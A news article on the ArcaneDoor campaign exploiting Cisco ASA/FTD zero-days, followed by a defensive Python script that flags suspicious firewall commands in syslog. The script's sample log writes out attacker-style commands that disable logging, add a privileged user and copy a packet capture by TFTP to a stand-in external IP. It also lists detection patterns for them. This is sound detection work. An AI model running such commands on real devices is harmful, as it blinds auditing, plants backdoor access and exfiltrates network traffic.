A state-sponsored threat actor exploited two previously unknown vulnerabilities in Cisco’s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) firewalls as part of a cyber-espionage campaign tracked as ArcaneDoor, which has prompted concern worldwide.
According to Cisco’s advisory, the two zero-days, CVE-2024-20353 and CVE-2024-20359, have been actively exploited since November 2023.
The actor behind ArcaneDoor, tracked as UAT4356 by Cisco Talos and as STORM-1849 by Microsoft, ran a wide-ranging operation against exposed edge devices and showed a deep understanding of the targeted systems. The initial access vector has still not been determined, but Cisco identified and patched the vulnerabilities the actor was using on compromised devices.
ArcaneDoor exploited the ASA and FTD vulnerabilities to deploy malware while evading detection.
Using these weaknesses, the ArcaneDoor actor implanted two pieces of malware, Line Dancer and Line Runner, on compromised ASA and FTD devices. Line Dancer is an in-memory shellcode loader that lets the actor execute arbitrary shellcode payloads, disable logging, open remote access, and exfiltrate packet captures taken on the device. Line Runner is a persistent backdoor that survives reboots, executes arbitrary Lua code on the compromised device, and uses several defence-evasion techniques to avoid discovery.
The UK’s National Cyber Security Centre (NCSC), the Canadian Centre for Cyber Security (Cyber Centre), and the Australian Signals Directorate’s Australian Cyber Security Centre (ACSC) jointly released an advisory describing the extent of the actor’s access inside infiltrated networks. By manipulating device configurations, controlling the syslog service, and altering authentication settings, the actor was able to conduct espionage and to capture and exfiltrate network traffic.
In response, Cisco released security updates for the zero-day vulnerabilities and advised all customers to patch their devices as soon as possible to reduce the risk of further attacks. Administrators were told to ensure strong authentication is enforced on the devices and to monitor system logs for signs of unauthorised activity, such as configuration changes they did not make.
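The advice to watch device logs for unauthorised activity can be turned into a concrete triage step. The Python script below is an added example, not code from Cisco or from the joint advisory: it scans ASA/FTD command-audit syslog messages (message IDs 111008 and 111010, which record the CLI commands an authenticated user executed) and flags the three behaviours described above: tampering with logging, changing authentication configuration, and starting or exporting an on-device packet capture. The sample log lines are constructed for the example; the hostname, IPs, usernames and timestamps are not real indicators, and the rule list is a starting point to be tuned against your own change-control records.

```python
"""Triage ASA/FTD command-audit syslog for ArcaneDoor-style tradecraft.

Added example with constructed sample data. It matches the two ASA
command-audit message types:
  %ASA-5-111008: User 'u' executed the 'cmd' command.
  %ASA-5-111010: User 'u', running 'app' from IP a.b.c.d, executed 'cmd'
and flags commands that touch logging, authentication, or packet capture.
"""
import re
from typing import Iterable, List, NamedTuple

# Extract the user and the executed command from either audit message form.
CMD_AUDIT_RE = re.compile(
    r"%(?:ASA|FTD)-\d-(?P<msgid>111008|111010): User '(?P<user>[^']+)'"
    r".*?executed (?:the )?'(?P<cmd>[^']+)'"
)

# (reason, pattern) pairs checked against the start of the executed command.
# Any hit is a configuration change worth reconciling with change control,
# not proof of compromise on its own.
SUSPICIOUS = [
    ("logging configuration changed",
     re.compile(r"^(no logging\b|clear logging\b|logging (host|enable)\b)")),
    ("authentication configuration changed",
     re.compile(r"^(no )?(aaa\b|username\b|enable password\b)")),
    ("packet capture started or exported",
     re.compile(r"^(capture\b|copy /pcap\b)")),
]


class Finding(NamedTuple):
    user: str
    command: str
    reason: str


def triage_asa_syslog(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per audited command that matches a SUSPICIOUS rule."""
    findings: List[Finding] = []
    for line in lines:
        m = CMD_AUDIT_RE.search(line)
        if not m:
            continue  # not a command-audit message (connection logs etc.)
        cmd = m.group("cmd").strip()
        for reason, pattern in SUSPICIOUS:
            if pattern.search(cmd):
                findings.append(Finding(m.group("user"), cmd, reason))
                break
    return findings


# Constructed sample: one benign connection event, one benign 'show', then a
# sequence resembling the behaviour described in the article.
SAMPLE_LOG = """\
<166>Jan 15 2024 03:12:01 asa-edge %ASA-6-302013: Built inbound TCP connection 9981 for outside:203.0.113.5/44120 (203.0.113.5/44120) to inside:10.0.0.10/443 (10.0.0.10/443)
<165>Jan 15 2024 03:12:44 asa-edge %ASA-5-111008: User 'enable_15' executed the 'show running-config' command.
<165>Jan 15 2024 03:13:02 asa-edge %ASA-5-111008: User 'enable_15' executed the 'no logging enable' command.
<165>Jan 15 2024 03:13:30 asa-edge %ASA-5-111010: User 'enable_15', running 'CLI' from IP 203.0.113.5, executed 'aaa authentication ssh console LOCAL'
<165>Jan 15 2024 03:14:05 asa-edge %ASA-5-111010: User 'enable_15', running 'CLI' from IP 203.0.113.5, executed 'username svc_backup password ***** privilege 15'
<165>Jan 15 2024 03:15:10 asa-edge %ASA-5-111008: User 'enable_15' executed the 'capture exfil interface inside match ip any any' command.
<165>Jan 15 2024 03:20:00 asa-edge %ASA-5-111008: User 'enable_15' executed the 'copy /pcap capture:exfil tftp://203.0.113.5/exfil.pcap' command.
"""

if __name__ == "__main__":
    for f in triage_asa_syslog(SAMPLE_LOG.splitlines()):
        print(f"[{f.reason}] user={f.user} cmd={f.command!r}")
```

Run against a syslog export from the collector rather than from the firewall itself: an actor who has disabled `logging enable` on the box has also stopped the audit trail at the source, so the absence of further 111008/111010 messages after such a hit is itself a signal.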
This incident is the latest in a string of alerts about threats to networking devices. Earlier warnings covered large-scale brute-force attacks against VPN and SSH services and gave guidance on defending Remote Access VPN services against password-spraying attacks.
As these threats keep evolving, proactive measures such as prompt patching, attentive log monitoring, and strong authentication remain essential for organisations to protect their networks from malicious actors.
